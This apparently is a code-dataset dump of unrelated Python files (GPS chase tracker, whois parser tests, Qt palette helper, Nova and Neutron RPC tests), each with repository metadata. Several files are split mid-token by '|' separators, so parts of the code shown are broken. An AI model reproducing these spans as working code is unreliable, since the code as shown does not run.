    while ancestor:
      rel_ancestor = uniform_path_format(os.path.relpath(ancestor, root))
      if rel_ancestor in data and data[rel_ancestor].get(tag):
        return data[rel_ancestor][tag]
      # '.' is the root-relative form of `root` itself; nothing above it.
      if rel_ancestor == '.':
        break
      ancestor = os.path.dirname(ancestor)
    # Implicit None: no ancestor defines this tag.
    return
  for dirname, _, files in os.walk(root):
    # Proofing against windows casing oddities.
    owners_file_names = [f for f in files if f.upper() == 'OWNERS']
    rel_dirname = uniform_path_format(os.path.relpath(dirname, root))
    if owners_file_names or include_subdirs:
      if owners_file_names:
        # Only the first OWNERS-cased file is parsed if several exist.
        owners_full_path = os.path.join(dirname, owners_file_names[0])
        data[rel_dirname] = parse(owners_full_path)
      else:
        data[rel_dirname] = {}
      # Inherit any tag not set locally from the nearest ancestor that
      # defines it (os.walk is top-down, so ancestors are already parsed).
      for tag in ('component', 'os', 'team'):
        if not tag in data[rel_dirname]:
          ancestor_tag = nearest_ancestor_tag(dirname, tag)
          if ancestor_tag:
            data[rel_dirname][tag] = ancestor_tag
  return data
|
richrr/coremicro
|
src/core/process_data.py
|
Python
|
gpl-2.0
| 2,807
| 0
|
# Copyright 2016, 2017 Richard Rodrigues, Nyle Rodgers, Mark Williams,
# Virginia Tech
#
# This file is part of Coremic.
#
# Coremic is free software: you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation, either version 3 of the License, or
# (at your option) any later version.
#
# Coremic is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with Coremic. If not, see <http://www.gnu.org/licenses/>.
from pval import getpval, correct_pvalues
from otu import Otu
def process(inputs, cfg):
    """Finds the core OTUs.

    Builds an Otu per observation in the filtered table, attaches raw and
    multiple-testing-corrected p-values, and returns only the OTUs that
    pass the significance/presence thresholds in cfg.
    """
    # Sample ids belonging to the interest group(s).
    interest_ids = set()
    for group_name in cfg['group']:
        interest_ids.update(inputs['mapping_dict'][group_name])
    table = inputs['filtered_data']
    i_indexes = [idx for idx, sample_id in enumerate(table.SampleIds)
                 if sample_id in interest_ids]
    otus = [Otu(vals, name, cfg['min_abundance'], i_indexes)
            for vals, name, md in table.iterObservations()]
    # Raw p-values, in the same order as `otus`.
    pvals = []
    for otu in otus:
        otu.pval = getpval(otu)
        pvals.append(otu.pval)
    # Attach corrected p-values (order is preserved by correct_pvalues).
    for otu, corrected_pval in zip(otus,
                                   correct_pvalues(pvals, cfg['p_val_adj'])):
        otu.corrected_pval = corrected_pval
    # Filter down to the core
    core = []
    for otu in otus:
        if (otu.corrected_pval <= cfg['max_p'] and
                otu.interest_frac >= cfg['min_frac'] and
                otu.out_frac <= cfg['max_out_presence']):
            core.append(otu)
    return core
def format_results(res, cfg):
    """Format the result data as a tsv.

    The output starts with a commented summary of the run parameters,
    then a header row, then one row per core OTU (sorted).
    """
    # Summary of the inputs given
    summary_rows = [
        '#Factor: ' + cfg['factor'],
        'Group: ' + ', '.join(cfg['group']),
        'Max Corrected p-val: %f' % cfg['max_p'],
        'Min Presence: %f' % cfg['min_frac'],
        'Max Out Presence: %f' % cfg['max_out_presence'],
        'Min Abundance: %f' % cfg['min_abundance'],
        'Correction Type: ' + cfg['p_val_adj'],
    ]
    # Header for results
    header_row = ['#OTU', 'Pval', 'Corrected Pval', 'Interest Group Presence',
                  'Out Group Presence']
    otu_rows = [[otu.name, otu.pval, otu.corrected_pval, otu.interest_frac,
                 otu.out_frac]
                for otu in sorted(res)]
    # Combine inputs, header, and information from core OTUs
    return to_tsv([summary_rows, header_row] + otu_rows)
def to_tsv(values):
    """Formats the given list of lists as a tsv string.

    str() is called on every item to convert it to a string.
    """
    rows = ['\t'.join(str(cell) for cell in row) for row in values]
    return '\n'.join(rows)
|
huyphan/pyyawhois
|
test/record/parser/test_response_whois_tonic_to_status_available.py
|
Python
|
mit
| 2,350
| 0.007234
|
# This file is autogenerated. Do not edit it manually.
# If you want change the content of this file, edit
#
# spec/fixtures/responses/whois.tonic.to/status_available
#
# and regenerate the tests with the following script
#
# $ scripts/generate_tests.py
#
from nose.tools import *
from dateutil.parser import parse as time_parse
import yawhois
class TestWhoisTonicToStatusAvailable(object):
    # Autogenerated fixture-driven tests for the whois.tonic.to parser on an
    # available-domain response. Regenerate with scripts/generate_tests.py
    # rather than editing by hand.

    def setUp(self):
        # Parse the canned whois response into the Record under test.
        fixture_path = "spec/fixtures/responses/whois.tonic.to/status_available.txt"
        host = "whois.tonic.to"
        part = yawhois.record.Part(open(fixture_path, "r").read(), host)
        self.record = yawhois.record.Record(None, [part])

    def test_status(self):
        eq_(self.record.status, 'available')

    def test_available(self):
        eq_(self.record.available, True)

    def test_registered(self):
        eq_(self.record.registered, False)

    def test_response_incomplete(self):
        eq_(self.record.response_incomplete, False)

    # The tonic.to parser supports none of the attributes below; each one
    # must raise AttributeNotSupported.
    def test_domain(self):
        assert_raises(yawhois.exceptions.AttributeNotSupported, self.record.domain)

    def test_nameservers(self):
        assert_raises(yawhois.exceptions.AttributeNotSupported, self.record.nameservers)

    def test_admin_contacts(self):
        assert_raises(yawhois.exceptions.AttributeNotSupported, self.record.admin_contacts)

    def test_created_on(self):
        assert_raises(yawhois.exceptions.AttributeNotSupported, self.record.created_on)

    def test_registrar(self):
        assert_raises(yawhois.exceptions.AttributeNotSupported, self.record.registrar)

    def test_registrant_contacts(self):
        assert_raises(yawhois.exceptions.AttributeNotSupported, self.record.registrant_contacts)

    def test_technical_contacts(self):
        assert_raises(yawhois.exceptions.AttributeNotSupported, self.record.technical_contacts)

    def test_updated_on(self):
        assert_raises(yawhois.exceptions.AttributeNotSupported, self.record.updated_on)

    def test_domain_id(self):
        assert_raises(yawhois.exceptions.AttributeNotSupported, self.record.domain_id)

    def test_expires_on(self):
        assert_raises(yawhois.exceptions.AttributeNotSupported, self.record.expires_on)

    def test_disclaimer(self):
        assert_raises(yawhois.exceptions.AttributeNotSupported, self.record.disclaimer)
|
projecthorus/chasetracker
|
ChaseTrackerNoGUI.py
|
Python
|
apache-2.0
| 6,363
| 0.006129
|
#!/usr/bin/env python
#
# ChaseTracker 2.0 No GUI Version
#
# Copyright 2015 Mark Jessop <vk5qi@rfhead.net>
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
import urllib2, json, ConfigParser, sys, time, serial
from threading import Thread
from base64 import b64encode
from hashlib import sha256
from datetime import datetime
from socket import *
# Attempt to read in config file
config = ConfigParser.RawConfigParser()
config.read("chasetracker.conf")
callsign = config.get("General","callsign")
# Seconds between Habitat position uploads.
update_rate = int(config.get("General","update_rate"))
serial_port = config.get("GPS","serial_port")
serial_baud = int(config.get("GPS","serial_baud"))
# NOTE(review): speed_cap is read here but never used below -- the cap in
# parseNMEA is hard-coded to 110 km/h. Confirm intended behavior.
speed_cap = int(config.get("GPS","speed_cap"))
# Position Variables
# Module-level GPS state, mutated by parseNMEA() and read by the uploaders.
position_valid = False
lat = -34.0
lon = 138.0
alt = 0
speed = 0 # m/s
def updateTerminal():
    # Print a one-line position summary; speed is converted m/s -> km/h.
    positionText = "Lat/Long: %.5f, %.5f \tSpeed: %d kph \tAlt: %d m" % (lat,lon,speed*3.6,alt)
    print positionText
# Courtesy of https://github.com/Knio/pynmea2/
import re
def dm_to_sd(dm):
    '''
    Converts a geographic coordinate given in NMEA "degrees/minutes"
    dddmm.mmmm format (ie, "12319.943281" = 123 degrees, 19.943281 minutes)
    to a signed decimal (python float) format.

    Empty strings and "0" map to 0.0; any other malformed input raises.
    '''
    if not dm or dm == '0':
        return 0.
    # Minutes are always the last two digits before the decimal point.
    match = re.match(r'^(\d+)(\d\d\.\d+)$', dm)
    degrees, minutes = match.groups()
    return float(degrees) + float(minutes) / 60
# We currently only recognise GPGGA and GPRMC
def parseNMEA(data):
    """Parse one NMEA 0183 sentence and update module-level position state.

    Only $GPRMC and $GPGGA sentences are handled; anything else is ignored.
    Fields are trusted to be well formed -- malformed sentences raise, and
    the caller's main loop wraps this in try/except.
    """
    global lat,lon,speed,alt,position_valid
    if "$GPRMC" in data:
        gprmc = data.split(",")
        gprmc_lat = dm_to_sd(gprmc[3])
        gprmc_latns = gprmc[4]
        gprmc_lon = dm_to_sd(gprmc[5])
        gprmc_lonew = gprmc[6]
        gprmc_speed = float(gprmc[7])
        # Southern latitudes are negative.
        if gprmc_latns == "S":
            lat = gprmc_lat*-1.0
        else:
            lat = gprmc_lat
        # BUG FIX: compare the hemisphere letter (gprmc_lonew), not the
        # numeric longitude, against "W" -- the old test could never match.
        if gprmc_lonew == "W":
            lon = gprmc_lon*-1.0
        else:
            lon = gprmc_lon
        # Speed over ground arrives in knots; convert to m/s and cap.
        # NOTE(review): cap is hard-coded to 110 km/h even though speed_cap
        # is read from the config file -- confirm which is intended.
        speed = min(110*0.27778, gprmc_speed*0.51444)
        updateTerminal()
    if "$GPGGA" in data:
        gpgga = data.split(",")
        gpgga_lat = dm_to_sd(gpgga[2])
        gpgga_latns = gpgga[3]
        gpgga_lon = dm_to_sd(gpgga[4])
        gpgga_lonew = gpgga[5]
        gpgga_fixstatus = gpgga[6]
        alt = float(gpgga[9])
        if gpgga_latns == "S":
            lat = gpgga_lat*-1.0
        else:
            lat = gpgga_lat
        # BUG FIX: same hemisphere-letter comparison fix as above.
        if gpgga_lonew == "W":
            lon = gpgga_lon*-1.0
        else:
            lon = gpgga_lon
        # BUG FIX: the fix-quality field is a *string*; the old comparison
        # to the integer 0 was always False, so position_valid was always
        # set True. Fix quality "0" (or a missing field) means no fix.
        if gpgga_fixstatus in ("0", ""):
            position_valid = False
        else:
            position_valid = True
# Habitat Upload Stuff, from https://raw.githubusercontent.com/rossengeorgiev/hab-tools/master/spot2habitat_chase.py
# True once the listener_information doc has been uploaded this session.
callsign_init = False
url_habitat_uuids = "http://habitat.habhub.org/_uuids?count=%d"
url_habitat_db = "http://habitat.habhub.org/habitat/"
# Pool of couchdb document UUIDs; refilled on demand by fetch_uuids().
uuids = []
def ISOStringNow():
    """Current UTC time as an ISO-8601 string with a trailing 'Z'."""
    return datetime.utcnow().isoformat() + "Z"
def postData(doc):
    # Upload one document to the habitat couchdb; returns the raw HTTP
    # response body. Mutates `doc` (adds '_id' and 'time_uploaded').
    # do we have at least one uuid, if not go get more
    if len(uuids) < 1:
        fetch_uuids()
    # add uuid and uploade time
    doc['_id'] = uuids.pop()
    doc['time_uploaded'] = ISOStringNow()
    data = json.dumps(doc)
    headers = {
        'Content-Type': 'application/json; charset=utf-8',
        'Referer': url_habitat_db,
    }
    print("Posting doc to habitat\n%s" % json.dumps(doc, indent=2))
    req = urllib2.Request(url_habitat_db, data, headers)
    return urllib2.urlopen(req).read()
def fetch_uuids():
    # Top up the local UUID pool (10 at a time) from habitat, retrying
    # forever on HTTP errors -- this blocks until it succeeds.
    while True:
        try:
            resp = urllib2.urlopen(url_habitat_uuids % 10).read()
            data = json.loads(resp)
        except urllib2.HTTPError, e:
            print("Unable to fetch uuids. Retrying in 10 seconds...");
            time.sleep(10)
            continue
        print("Received a set of uuids.")
        uuids.extend(data['uuids'])
        break;
def init_callsign():
    # Register this chase-car callsign with habitat (a listener_information
    # document). Retries forever so a flaky link cannot skip registration.
    doc = {
        'type': 'listener_information',
        'time_created' : ISOStringNow(),
        'data': { 'callsign': callsign }
    }
    while True:
        try:
            resp = postData(doc)
            print("Callsign initialized.")
            break;
        except urllib2.HTTPError, e:
            print("Unable initialize callsign. Retrying in 10 seconds...");
            time.sleep(10)
            continue
def uploadPosition():
    # Push the current GPS state to habitat as a listener_telemetry doc.
    # initialize call sign (one time only)
    global callsign_init
    if not callsign_init:
        init_callsign()
        callsign_init = True
    doc = {
        'type': 'listener_telemetry',
        'time_created': ISOStringNow(),
        'data': {
            'callsign': callsign,
            'chase': True,
            'latitude': lat,
            'longitude': lon,
            'altitude': alt,
            'speed': speed,
        }
    }
    # post position to habitat
    try:
        postData(doc)
    except urllib2.HTTPError, e:
        # Best effort: a failed upload is reported but not retried.
        print("Unable to upload data!")
        return
    print("Uploaded Data at: %s" % ISOStringNow())
def uploadNow():
    """Upload the current position to Habitat if we have a GPS fix.

    Failures are logged and otherwise ignored -- uploads are best-effort
    and must never kill the main serial loop.
    """
    if position_valid:
        try:
            uploadPosition()
        except Exception as e:
            # BUG FIX: was a bare 'except: pass', which also swallowed
            # KeyboardInterrupt/SystemExit and hid every error silently.
            print("Position upload failed: %s" % e)
# Start UDP Listener Thread
# NOTE(review): the two comments above/below are stale copies from the GUI
# version -- this script starts no UDP thread and no Qt event loop.
serial_running = True
lastUploadTime = time.time()
## Start Qt event loop unless running in interactive mode or using pyside.
if __name__ == '__main__':
    try:
        ser = serial.Serial(port=serial_port,baudrate=serial_baud,timeout=5)
    except Exception as e:
        print("Serial Port Error: %s" % e)
        sys.exit(1)
    # Main loop: read NMEA lines from the GPS and upload the position to
    # Habitat every update_rate seconds.
    while serial_running:
        data = ser.readline()
        try:
            parseNMEA(data)
        except Exception as e:
            # A single bad sentence must not stop the loop.
            print str(e)
            print "Failed to Parse NMEA: " + data
        if (time.time() - lastUploadTime)>update_rate:
            uploadNow()
            lastUploadTime = time.time()
    ser.close()
|
jmarcelogimenez/petroSym
|
petroSym/utils.py
|
Python
|
gpl-2.0
| 11,739
| 0.007837
|
# -*- coding: utf-8 -*-
"""
Created on Wed Aug 19 17:08:36 2015
@author: jgimenez
"""
from PyQt4 import QtGui, QtCore
import os
import time
import subprocess
# Field name -> field rank ('scalar'/'vector') for the solver unknowns
# below. NOTE(review): these look like OpenFOAM field names (p, U, k,
# epsilon, ...) -- confirm against the solvers this GUI drives.
types = {}
types['p'] = 'scalar'
types['U'] = 'vector'
types['p_rgh'] = 'scalar'
types['k'] = 'scalar'
types['epsilon'] = 'scalar'
types['omega'] = 'scalar'
types['alpha'] = 'scalar'
types['nut'] = 'scalar'
types['nuTilda'] = 'scalar'
types['nuSgs'] = 'scalar'
# All unknown field names the application knows how to handle.
unknowns = ['U','p','p_rgh','alpha','k','nuSgs','epsilon','omega','nuTilda','nut']
def drange(start, stop, step):
    """Generator yielding start, start+step, ... while the value < stop.

    Float analogue of range(); note the usual floating-point accumulation
    caveats apply for non-representable steps.
    """
    current = start
    while current < stop:
        yield current
        current += step
def command_window(palette):
brush = QtGui.QBrush(QtGui.QColor(255, 255, 255))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Active, QtGui.QPalette.WindowText, brush)
brush = QtGui.QBrush(QtGui.QColor(0, 0, 0))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Active, QtGui.QPalette.Button, brush)
brush = QtGui.QBrush(QtGui.QColor(0, 0, 0))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Active, QtGui.QPalette.Light, brush)
brush = QtGui.QBrush(QtGui.QColor(0, 0, 0))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Active, QtGui.QPalette.Midlight, brush)
brush = QtGui.QBrush(QtGui.QColor(0, 0, 0))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Active, QtGui.QPalette.Dark, brush)
brush = QtGui.QBrush(QtGui.QColor(0, 0, 0))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Active, QtGui.QPalette.Mid, brush)
brush = QtGui.QBrush(QtGui.QColor(255, 255, 255))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Active, QtGui.QPalette.Text, brush)
brush = QtGui.QBrush(QtGui.QColor(255, 255, 255))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Active, QtGui.QPalette.BrightText, brush)
brush = QtGui.QBrush(QtGui.QColor(255, 255, 255))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Active, QtGui.QPalette.ButtonText, brush)
brush = QtGui.QBrush(QtGui.QColor(0, 0, 0))
brush.setStyle(QtCore.Qt.SolidPattern)
|
palette.setBrush(QtGui.QPalette.Active, QtGui.QPalette.Base, brush)
brush = QtGui.QBrush(QtGui.QColor(0, 0, 0))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Active, QtGui.QPalette.Window, brush)
brush = QtGui.QBrush(QtGui.QColor(0, 0, 0))
brush.setStyle(QtCore.Qt.S
|
olidPattern)
palette.setBrush(QtGui.QPalette.Active, QtGui.QPalette.Shadow, brush)
brush = QtGui.QBrush(QtGui.QColor(0, 0, 0))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Active, QtGui.QPalette.AlternateBase, brush)
brush = QtGui.QBrush(QtGui.QColor(255, 255, 220))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Active, QtGui.QPalette.ToolTipBase, brush)
brush = QtGui.QBrush(QtGui.QColor(0, 0, 0))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Active, QtGui.QPalette.ToolTipText, brush)
brush = QtGui.QBrush(QtGui.QColor(255, 255, 255))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Inactive, QtGui.QPalette.WindowText, brush)
brush = QtGui.QBrush(QtGui.QColor(0, 0, 0))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Inactive, QtGui.QPalette.Button, brush)
brush = QtGui.QBrush(QtGui.QColor(0, 0, 0))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Inactive, QtGui.QPalette.Light, brush)
brush = QtGui.QBrush(QtGui.QColor(0, 0, 0))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Inactive, QtGui.QPalette.Midlight, brush)
brush = QtGui.QBrush(QtGui.QColor(0, 0, 0))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Inactive, QtGui.QPalette.Dark, brush)
brush = QtGui.QBrush(QtGui.QColor(0, 0, 0))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Inactive, QtGui.QPalette.Mid, brush)
brush = QtGui.QBrush(QtGui.QColor(255, 255, 255))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Inactive, QtGui.QPalette.Text, brush)
brush = QtGui.QBrush(QtGui.QColor(255, 255, 255))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Inactive, QtGui.QPalette.BrightText, brush)
brush = QtGui.QBrush(QtGui.QColor(255, 255, 255))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Inactive, QtGui.QPalette.ButtonText, brush)
brush = QtGui.QBrush(QtGui.QColor(0, 0, 0))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Inactive, QtGui.QPalette.Base, brush)
brush = QtGui.QBrush(QtGui.QColor(0, 0, 0))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Inactive, QtGui.QPalette.Window, brush)
brush = QtGui.QBrush(QtGui.QColor(0, 0, 0))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Inactive, QtGui.QPalette.Shadow, brush)
brush = QtGui.QBrush(QtGui.QColor(0, 0, 0))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Inactive, QtGui.QPalette.AlternateBase, brush)
brush = QtGui.QBrush(QtGui.QColor(255, 255, 220))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Inactive, QtGui.QPalette.ToolTipBase, brush)
brush = QtGui.QBrush(QtGui.QColor(0, 0, 0))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Inactive, QtGui.QPalette.ToolTipText, brush)
brush = QtGui.QBrush(QtGui.QColor(0, 0, 0))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Disabled, QtGui.QPalette.WindowText, brush)
brush = QtGui.QBrush(QtGui.QColor(0, 0, 0))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Disabled, QtGui.QPalette.Button, brush)
brush = QtGui.QBrush(QtGui.QColor(0, 0, 0))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Disabled, QtGui.QPalette.Light, brush)
brush = QtGui.QBrush(QtGui.QColor(0, 0, 0))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Disabled, QtGui.QPalette.Midlight, brush)
brush = QtGui.QBrush(QtGui.QColor(0, 0, 0))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Disabled, QtGui.QPalette.Dark, brush)
brush = QtGui.QBrush(QtGui.QColor(0, 0, 0))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Disabled, QtGui.QPalette.Mid, brush)
brush = QtGui.QBrush(QtGui.QColor(0, 0, 0))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Disabled, QtGui.QPalette.Text, brush)
brush = QtGui.QBrush(QtGui.QColor(255, 255, 255))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Disabled, QtGui.QPalette.BrightText, brush)
brush = QtGui.QBrush(QtGui.QColor(0, 0, 0))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Disabled, QtGui.QPalette.ButtonText, brush)
brush = QtGui.QBrush(QtGui.QColor(0, 0, 0))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Disabled, QtGui.QPalette.Base, brush)
brush = QtGui.QBrush(QtGui.QColor(0, 0, 0))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Disabled, QtGui.QPalette.Window, brush)
brush = QtGui.QBrush(QtGui.QColor(0, 0, 0))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Disabled, QtGui.QPalette.Shadow, brush)
brush = QtGui.QBrush(QtGui.QColor(0, 0, 0))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Disabled, QtGui.QPalette.AlternateBase, brush)
brush = QtGui.QBrush(QtGui.QColor(255, 255, 220))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Disabled, QtGui.QPalette.ToolTipBase, brush)
brush = QtGui.QBrush(QtGui.QColor(0, 0, 0))
brush.setStyle(QtCore.Qt.SolidPattern)
|
TriumphLLC/FashionProject
|
modules/operators/tools/detail_tool/detail_tool.py
|
Python
|
gpl-3.0
| 579
| 0.02403
|
import bpy
from fashion_project.modules.draw.detail_tool.detail_tool import ToolDetail
class FP_DetailTool(bpy.types.Operator):
    '''
    Detail tool: creates a closed contour.
    '''
    bl_idname = "fp.detail_tool"
    bl_label = "FP_DetailTool"

    @classmethod
    def poll(cls, context):
        # Enabled only when the underlying draw tool says it can run.
        return ToolDetail().poll(context)

    def execute(self, context):
        # Delegate the actual geometry creation to the draw-layer tool.
        ToolDetail().create(context)
        return {'FINISHED'}
def register():
    # Blender add-on hook: expose the operator to the UI.
    bpy.utils.register_class(FP_DetailTool)
def unregister():
    # Blender add-on hook: remove the operator again.
    bpy.utils.unregister_class(FP_DetailTool)
|
rcbops/nova-buildpackage
|
nova/tests/rpc/test_carrot.py
|
Python
|
apache-2.0
| 1,534
| 0
|
# vim: tabstop=4 shiftwidth=4 softtabstop=4
# Copyright 2010 United States Government as represented by the
# Administrator of the National Aeronautics and Space Administration.
# All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
"""
Unit Tests for remote procedure calls using carr
|
ot
"""
from nova import log as logging
from nova.rpc import impl_carrot
from nova.tests.rpc import common
LOG = logging.getLogger('nova.tests.rpc')
|
class RpcCarrotTestCase(common._BaseRpcTestCase):
    # Runs the shared RPC test suite against the carrot implementation.
    def setUp(self):
        # The base class drives all common tests through self.rpc.
        self.rpc = impl_carrot
        super(RpcCarrotTestCase, self).setUp()
    def tearDown(self):
        super(RpcCarrotTestCase, self).tearDown()
    def test_connectionpool_single(self):
        """Test that ConnectionPool recycles a single connection."""
        conn1 = self.rpc.ConnectionPool.get()
        self.rpc.ConnectionPool.put(conn1)
        conn2 = self.rpc.ConnectionPool.get()
        self.rpc.ConnectionPool.put(conn2)
        # With only one connection checked in, get() must hand it back out.
        self.assertEqual(conn1, conn2)
|
beagles/neutron_hacking
|
neutron/tests/unit/linuxbridge/test_rpcapi.py
|
Python
|
apache-2.0
| 5,482
| 0
|
# vim: tabstop=4 shiftwidth=4 softtabstop=4
# Copyright 2012, Red Hat, Inc.
#
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
"""
Unit Tests for linuxbridge rpc
"""
import mock
from oslo.config import cfg
from neutron.agent import rpc as agent_rpc
from neutron.common import topics
from neutron.openstack.common import context
from neutron.plugins.linuxbridge import lb_neutron_plugin as plb
from neutron.tests import base
class rpcApiTestCase(base.BaseTestCase):
    """Verify the linuxbridge RPC API wrappers drive the client correctly."""

    def _test_lb_api(self, rpcapi, topic, method, rpc_method, fanout,
                     expected_msg=None, **kwargs):
        # Generic driver: invoke `method` on `rpcapi` with a mocked client
        # and assert on the prepare() arguments and the cast/call payload.
        # expected_msg defaults to the kwargs that were passed through.
        ctxt = context.RequestContext('fake_user', 'fake_project')
        expected_retval = 'foo' if method == 'call' else None
        if not expected_msg:
            expected_msg = kwargs.copy()
        with mock.patch.object(rpcapi.client, 'prepare') as mock_prepare:
            prepared = mock_prepare.return_value
            getattr(prepared, rpc_method).return_value = expected_retval
            retval = getattr(rpcapi, method)(ctxt, **kwargs)
            self.assertEqual(expected_retval, retval)
            expected_prepare_args = {}
            if fanout:
                expected_prepare_args['fanout'] = fanout
            if topic != topics.PLUGIN:
                expected_prepare_args['topic'] = topic
            mock_prepare.assert_called_with(**expected_prepare_args)
            getattr(prepared, rpc_method).assert_called_with(
                ctxt,
                method,
                **expected_msg)

    def test_delete_network(self):
        # network_delete is fanout-cast on the network-delete topic.
        notifier = plb.AgentNotifierApi(topics.AGENT)
        self._test_lb_api(notifier,
                          topics.get_topic_name(topics.AGENT,
                                                topics.NETWORK,
                                                topics.DELETE),
                          'network_delete', rpc_method='cast', fanout=True,
                          network_id='fake_request_spec')

    def test_port_update(self):
        cfg.CONF.set_override('rpc_support_old_agents', False, 'AGENT')
        notifier = plb.AgentNotifierApi(topics.AGENT)
        expected_msg = {'port': 'fake_port',
                        'network_type': 'vlan',
                        'physical_network': 'fake_net',
                        'segmentation_id': 'fake_vlan_id'}
        self._test_lb_api(notifier,
                          topics.get_topic_name(topics.AGENT,
                                                topics.PORT,
                                                topics.UPDATE),
                          'port_update', rpc_method='cast', fanout=True,
                          expected_msg=expected_msg,
                          port='fake_port',
                          physical_network='fake_net',
                          vlan_id='fake_vlan_id')

    def test_port_update_old_agent(self):
        # Old agents additionally expect the legacy 'vlan_id' key.
        cfg.CONF.set_override('rpc_support_old_agents', True, 'AGENT')
        notifier = plb.AgentNotifierApi(topics.AGENT)
        expected_msg = {'port': 'fake_port',
                        'network_type': 'vlan',
                        'physical_network': 'fake_net',
                        'segmentation_id': 'fake_vlan_id',
                        'vlan_id': 'fake_vlan_id'}
        self._test_lb_api(notifier,
                          topics.get_topic_name(topics.AGENT,
                                                topics.PORT,
                                                topics.UPDATE),
                          'port_update', rpc_method='cast', fanout=True,
                          expected_msg=expected_msg,
                          port='fake_port',
                          physical_network='fake_net',
                          vlan_id='fake_vlan_id')

    def test_device_details(self):
        plugin_api = agent_rpc.PluginApi(topics.PLUGIN)
        self._test_lb_api(plugin_api, topics.PLUGIN,
                          'get_device_details', rpc_method='call',
                          fanout=False,
                          device='fake_device',
                          agent_id='fake_agent_id')

    def test_update_device_down(self):
        plugin_api = agent_rpc.PluginApi(topics.PLUGIN)
        self._test_lb_api(plugin_api, topics.PLUGIN,
                          'update_device_down', rpc_method='call',
                          fanout=False,
                          device='fake_device',
                          agent_id='fake_agent_id',
                          host='fake_host')

    def test_update_device_up(self):
        plugin_api = agent_rpc.PluginApi(topics.PLUGIN)
        self._test_lb_api(plugin_api, topics.PLUGIN,
                          'update_device_up', rpc_method='call',
                          fanout=False,
                          device='fake_device',
